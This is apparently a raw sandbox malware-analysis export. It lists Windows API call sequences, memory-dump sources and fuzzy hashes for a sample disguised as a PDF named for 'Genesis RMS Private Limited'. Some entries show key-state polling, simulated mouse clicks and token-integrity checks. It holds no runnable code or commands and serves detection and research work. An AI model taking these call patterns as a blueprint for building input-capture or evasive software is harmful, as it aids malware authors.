• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CDD35
  • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
  • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Opcode ID: 2fa6e8c22776f257273f61f42dc8c98bb2c18f8045085979164469b3fef24e26
• Instruction ID: 5298be584c57eb96508ad3ba6e6b19dbc4bed1be9ff7c612d421183656d564fd
• Opcode Fuzzy Hash: 2fa6e8c22776f257273f61f42dc8c98bb2c18f8045085979164469b3fef24e26
• Instruction Fuzzy Hash: 5D511775A00609DFCB10EF68C898DADB7F4FF58310B14C0AAE916AB311DB79AD45CB91
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007BE88A
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007BE8B3
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007BE8F2
  • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
  • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007BE917
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007BE91F
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 7a76801f1945f4e685ddab627e19c8c2e1d8d2ad5aaf2e551e610541c9039c1b
• Instruction ID: 9baa7aa712e1f5ab50a2e96d7b297d6b92576b964b73e3dc509a0d5b046914ca
• Opcode Fuzzy Hash: 7a76801f1945f4e685ddab627e19c8c2e1d8d2ad5aaf2e551e610541c9039c1b
• Instruction Fuzzy Hash: 4A511A35A00209DFCF01EF64C985AADBBF5EF48315B188099E90AAB361CB75ED15CB51
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8f5db0251ea08f79fa8c3ceb75750801907de4f34abcf92238544389cf34ce1
• Instruction ID: e21295da74353e62ddc0f395dc34b9d2d71e3159bd0d918c1441d9727716c229
• Opcode Fuzzy Hash: c8f5db0251ea08f79fa8c3ceb75750801907de4f34abcf92238544389cf34ce1
• Instruction Fuzzy Hash: 4241D335901144BFC710DB28CC48FA9BBBAFB09310F194266F856A73E1D778AE51DA61
APIs
• GetCursorPos.USER32(?), ref: 00752357
• ScreenToClient.USER32(008167B0,?), ref: 00752374
• GetAsyncKeyState.USER32(00000001), ref: 00752399
• GetAsyncKeyState.USER32(00000002), ref: 007523A7
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 8e6dcbd9db607256147e83c22cad744282a79491491ea5013d05ad943d67ed58
• Instruction ID: 2613066543cfb9554d06db7bad243e8bd2c11c416693ee502b5979184d694890
• Opcode Fuzzy Hash: 8e6dcbd9db607256147e83c22cad744282a79491491ea5013d05ad943d67ed58
• Instruction Fuzzy Hash: AC418F31504119FBDF169F68C848AE9BB74FB06321F20436AF929922A1C7789D58DFA1
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A695D
• TranslateAcceleratorW.USER32(?,?,?), ref: 007A69A9
• TranslateMessage.USER32(?), ref: 007A69D2
• DispatchMessageW.USER32(?), ref: 007A69DC
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A69EB
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
• Opcode ID: fe1838ec772c73f711505edec85ef1510210a55d4ac30ce646982a2c637b41d7
• Instruction ID: 48a7775469d26e9c6de02f562c0b0df1d5147b81c5a8fa385db5c6b07cd902ce
• Opcode Fuzzy Hash: fe1838ec772c73f711505edec85ef1510210a55d4ac30ce646982a2c637b41d7
• Instruction Fuzzy Hash: E731C271900246AADB208F749C48BF77BACBF43304F18C769E462D20A1E739E899D790
APIs
• GetWindowRect.USER32(?,?), ref: 007A8F12
• PostMessageW.USER32(?,00000201,00000001), ref: 007A8FBC
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007A8FC4
• PostMessageW.USER32(?,00000202,00000000), ref: 007A8FD2
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007A8FDA
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 578fc7e1048e0022a4909809315b610002f3026e4e340cf0d72d9b58489796de
• Instruction ID: c390d3158692a353bf5aeaff9da5451fe0bf9ba1aaf151b0c862c60e3f74b19a
• Opcode Fuzzy Hash: 578fc7e1048e0022a4909809315b610002f3026e4e340cf0d72d9b58489796de
• Instruction Fuzzy Hash: 8E31E07150021AEFDF00CF68D94CA9E7BB6FB45315F10822AF925EA2D0C7B89910CB91
APIs
• IsWindowVisible.USER32(?), ref: 007AB6C7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AB6E4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AB71C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007AB742
• _wcsstr.LIBCMT ref: 007AB74C
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: 222a8fdfa653b824d5d6164b663e2f77b6f8f3ef94667e38007edd01085df0b0
• Instruction ID: 0e137467bfcb212486eda73b8f0f5f3b96fe6b03f3023b01a4c9a5f72b5a980c
• Opcode Fuzzy Hash: 222a8fdfa653b824d5d6164b663e2f77b6f8f3ef94667e38007edd01085df0b0
• Instruction Fuzzy Hash: F221FC31205204FBEB155B399C49E7B7BA8DF8A750F00813AFC09CA1A2EFA9DC409750
APIs
  • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
• GetWindowLongW.USER32(?,000000F0), ref: 007DB44C
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007DB471
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007DB489
• GetSystemMetrics.USER32(00000004), ref: 007DB4B2
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007C1184,00000000), ref: 007DB4D0
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: 303b8e7df0e91bf1ea4fef2973a347a974e98cd071402d4d37792f97ba719ae7
• Instruction ID: ce64183522481371679227ed7d2cb30083d85ea53f82f6094201bd9d98635a2a
• Opcode Fuzzy Hash: 303b8e7df0e91bf1ea4fef2973a347a974e98cd071402d4d37792f97ba719ae7
• Instruction Fuzzy Hash: 16217171610295EFCB10DF389C04A6A37B4FB05721F16873AF966D62E1E7349821DB90
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007A9802
  • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9834
• __itow.LIBCMT ref: 007A984C
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9874
• __itow.LIBCMT ref: 007A9885
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
• Opcode ID: c6ce652eaa56046bbf09cb09fef7ad6841c2ba385f490adfafa6a04f2f28f015
• Instruction ID: b9672a5e091d15f4c1fde5e1bf261297fd07c1ef437a501b88e54dbfb3993e14
• Opcode Fuzzy Hash: c6ce652eaa56046bbf09cb09fef7ad6841c2ba385f490adfafa6a04f2f28f015
• Instruction Fuzzy Hash: D021F531B01208EBDB109A659C8AEEE3BB8EF8AB11F044025FE05DB281D67C8D55D7D2
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
• SelectObject.GDI32(?,00000000), ref: 0075135C
• BeginPath.GDI32(?), ref: 00751373
• SelectObject.GDI32(?,00000000), ref: 0075139C
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 1227f8c00d89740d9168d98f7d466f6fd35d1a3e76b5478eb7b14b4df33862fe
• Instruction ID: 4ed28b97b76e7a13d2c184f092a6f4ee1e91bd0e1fcb3e152eb123a7500e1eef
• Opcode Fuzzy Hash: 1227f8c00d89740d9168d98f7d466f6fd35d1a3e76b5478eb7b14b4df33862fe
• Instruction Fuzzy Hash: E8213D70801208EFDB119F29EC087E97BBDFB00323F54C236F851965A0E7B999A5DB90
APIs
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 839f81c2acb095bf305f0f473c08d2b838dfb5ceec0261b523f69cdf7a5b89fe
• Instruction ID: d3b1bb3cdd719f0facd5922c27054841b5851c2ef731d4699eef1fd237a1f7af
• Opcode Fuzzy Hash: 839f81c2acb095bf305f0f473c08d2b838dfb5ceec0261b523f69cdf7a5b89fe
• Instruction Fuzzy Hash: 0501D6F170520DBBD605AA25CD46E6B639D9BA6394B448110FD04D6243EE5CAE11C3A1
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 007B4D5C
                                                                                                                      • __beginthreadex.LIBCMT ref: 007B4D7A
                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 007B4D8F
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007B4DA5
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007B4DAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3824534824-0
                                                                                                                      • Opcode ID: 3a919c1ac0fcb54d9999d27786901a8ba616c0c74082f8714aa547693b2bbf84
                                                                                                                      • Instruction ID: dcd40a493acf34f8ca65b149b854d04eb51835321ebd93f1eb8c68515f4aaf37
                                                                                                                      • Opcode Fuzzy Hash: 3a919c1ac0fcb54d9999d27786901a8ba616c0c74082f8714aa547693b2bbf84
                                                                                                                      • Instruction Fuzzy Hash: 601108B2A05208BFC7119BA8DC08BEA7FACFF45320F188266F955D3251D6798D0087A1
                                                                                                                      APIs
                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                                                                                                                      • GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842720411-0
                                                                                                                      • Opcode ID: b1b23c8b84d4aabcd2372918aa69ffd44ebc693a37a32c2e204188b90ab6fbfd
                                                                                                                      • Instruction ID: 9008e9ea7edbc7f41aa2993f201c3ddb79e67e4b3c70861dcab94b976bd8bcc9
                                                                                                                      • Opcode Fuzzy Hash: b1b23c8b84d4aabcd2372918aa69ffd44ebc693a37a32c2e204188b90ab6fbfd
                                                                                                                      • Instruction Fuzzy Hash: 70011271601204FFDB105FA5DC48D67BF7DFF86755720457AF84AC6160DA359D00CA61
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5502
                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5510
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5518
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5522
                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2833360925-0
                                                                                                                      • Opcode ID: 05c265378fd5870b7b9e58fae65d383626ef1f94cbed2c8a30a7a3354f5e7eb6
                                                                                                                      • Instruction ID: 4bc73bc5d148a7e638ae45a998cd98605161da5ddc25f8c79da3733e182064aa
                                                                                                                      • Opcode Fuzzy Hash: 05c265378fd5870b7b9e58fae65d383626ef1f94cbed2c8a30a7a3354f5e7eb6
                                                                                                                      • Instruction Fuzzy Hash: 71013971D01A1DDBCF10EFE8E8487EDBB79BF09712F004156E802B2140DB395560C7A5
                                                                                                                      APIs
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?,?,007A799D), ref: 007A766F
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A768A
                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A7698
                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?), ref: 007A76A8
                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A76B4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3897988419-0
                                                                                                                      • Opcode ID: 8e2733e7d3bfbba8d71c29c832468dfc3680dcc81aae59badff29f10facab42e
                                                                                                                      • Instruction ID: bab3d55c45605aaec1b12eae9f5c899eb35611f759c831c1550cb0c1785001ba
                                                                                                                      • Opcode Fuzzy Hash: 8e2733e7d3bfbba8d71c29c832468dfc3680dcc81aae59badff29f10facab42e
                                                                                                                      • Instruction Fuzzy Hash: 740184B2601604BBDB145F58DC44BAA7BFDEB85761F148129FD05D3211E739DE40E7A0
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A8608
                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A8612
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A8621
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A8628
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A863E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 44706859-0
                                                                                                                      • Opcode ID: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                                                                                                                      • Instruction ID: 0a0d0d43b3f212de7b95f964db5fc45b5b0400c4b261596f759dd76f3e79a666
                                                                                                                      • Opcode Fuzzy Hash: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                                                                                                                      • Instruction Fuzzy Hash: 88F06D31202204AFEB101FA5DD8DE6B3BBCEF8A754B08852AF94AC7151CB799C41DA65
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8669
                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A8673
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8682
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8689
                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A869F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
